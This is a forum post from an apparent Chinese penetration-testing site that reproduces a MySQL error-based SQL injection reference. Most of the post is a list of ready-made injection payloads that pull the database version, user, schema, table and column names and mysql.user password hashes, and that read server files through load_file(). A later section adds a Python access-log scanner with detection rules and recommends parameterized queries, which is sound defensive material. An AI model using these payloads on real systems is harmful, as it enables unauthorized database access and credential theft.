中国网络渗透测试联盟
Title:
MySQL Error-Based Injection Reference (pdf)
Author:
admin
Time:
2013-7-27 11:00
Title:
MySQL Error-Based Injection Reference (pdf)
This post was last edited by Nightmare on 2013-3-17 14:20

MySQL error-based injection reference (pdf), one post a day...

MySql Error Based Injection Reference
[MySQL Error-Based Injection Reference]

Author: pnig0s1992

Blog:
http://pnig0s1992.blog.51cto.com/

Team:
http://www.FreeBuf.com/

Tested on MySQL 5.0.91; it works on the large majority of 5.x versions.

A small number of versions throw an error when name_const() is used; for those, use the Method.2 variant given below.

Query the version:
Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c)

Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+group by a)b)

Query the current user:
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)

Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Query the current database:
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)

Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Enumerate the databases one by one:

and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c)

Substitute n in sequence (0, 1, 2, ...).

Get the number of tables in a given database:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+table_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

0x6D7973716C = mysql

Enumerate the tables one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+table_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

0x6D7973716C = mysql; substitute n in sequence.

Get the number of columns in a table:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

0x6D7973716C = mysql, 0x636F6C756D6E735F70726976 = columns_priv

Enumerate the columns one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

Substitute n in sequence.

Enumerate the row contents one by one:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

Substitute n in sequence.

Read file contents:
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a from+information_schema.tables+group+by+a)b)

0x433A5C5C626F6F742E696E69 = C:\\boot.ini (the payload above uses 0x433A5C5C746573742E617361 = C:\\test.asa). Because only 64 bytes of content can be extracted per error, use substring() to control which bytes are displayed.

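From the defender's side, every payload on this page is built from a handful of fixed tokens: floor(rand(0)*2) together with group by (the duplicate-key trick that forces the error), name_const() self-joins, information_schema. lookups and load_file(). That makes the requests easy to flag in web-server access logs, and the 500 responses that accompany them are the other tell, since the technique only works when the database error is reflected to the client. The script below is an added example, not part of the original post or the author's reference: it parses constructed combined-format log lines (the request URLs reuse the post's own payload shapes; the IPs, paths, timestamps and sizes are made up), URL-decodes the query string, applies those rules, and decodes any 0x... hex literals so an analyst can see which database, table or file path a request named. The rule names and function names are my own.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed combined-format access-log lines (not from the original post);
# the request URLs reuse the payload shapes listed above, everything else is made up.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Jul/2013:11:00:01 +0800] "GET /news.php?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [27/Jul/2013:11:00:07 +0800] "GET /news.php?id=1+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+group+by+a)b) HTTP/1.1" 500 312
203.0.113.5 - - [27/Jul/2013:11:00:12 +0800] "GET /news.php?id=1+and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c) HTTP/1.1" 500 298
198.51.100.9 - - [27/Jul/2013:11:01:03 +0800] "GET /search.php?q=random+group+photos HTTP/1.1" 200 8801
203.0.113.5 - - [27/Jul/2013:11:01:30 +0800] "GET /news.php?id=1+and+(SELECT+1+FROM+(select%20count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a+from+information_schema.tables+group+by+a)b) HTTP/1.1" 500 330
"""

# Client IP, quoted request line and status code of a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Detection rules (names are my own). Every regex in a rule must match the
# normalized query for the rule to fire. "group by" on its own is deliberately
# not a rule, because it appears in harmless requests; it only counts together
# with the floor(rand(0)*2) duplicate-key construction.
RULES = [
    ("error-based: floor(rand(0)*2) duplicate key",
     [r"floor\(\s*rand\(\s*0\s*\)\s*\*\s*2\s*\)", r"\bgroup\s+by\b"]),
    ("error-based: name_const() self-join", [r"\bname_const\s*\("]),
    ("schema enumeration via information_schema", [r"\binformation_schema\."]),
    ("file read via load_file()", [r"\bload_file\s*\("]),
]


def normalize_query(url):
    """URL-decode the query string ('+' and %xx), lowercase it and collapse
    whitespace so spacing tricks do not slip past the rules."""
    decoded = unquote_plus(urlsplit(url).query).lower()
    return re.sub(r"\s+", " ", decoded)


def classify(query):
    """Names of all rules whose regexes all match the normalized query."""
    return [name for name, patterns in RULES
            if all(re.search(p, query) for p in patterns)]


def decode_hex_literals(query):
    """Decode MySQL 0x... string literals (e.g. 0x6d7973716c -> 'mysql') so the
    analyst can see which database, table or file path the request named."""
    out = []
    for hexdigits in re.findall(r"\b0x([0-9a-fA-F]+)\b", query):
        if len(hexdigits) % 2 == 0:  # odd-length literals are plain numbers, skip them
            out.append(bytes.fromhex(hexdigits).decode("latin-1"))
    return out


def scan_log(text):
    """Parse each log line; return the entries that trigger at least one rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = normalize_query(m["url"])
        findings = classify(query)
        if findings:
            hits.append({
                "ip": m["ip"],
                "url": m["url"],
                "status": int(m["status"]),
                "findings": findings,
                "hex_literals": decode_hex_literals(query),
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["findings"], hit["hex_literals"])
```

Run as a script it reports the three injected requests (all from 203.0.113.5, all answered with 500) and stays quiet on the two benign ones, including the search for "random group photos", which contains "group" and "rand" but not the duplicate-key construction. Decoding the hex literal in the last hit shows the file path C:\\test.asa that the load_file() call named. The corresponding fixes on the application side are parameterized queries, so the injected text never reaches the parser, and not returning database error text to clients, which removes the channel every payload on this page relies on.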
Thx for reading.

It's also fine not to download it.

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2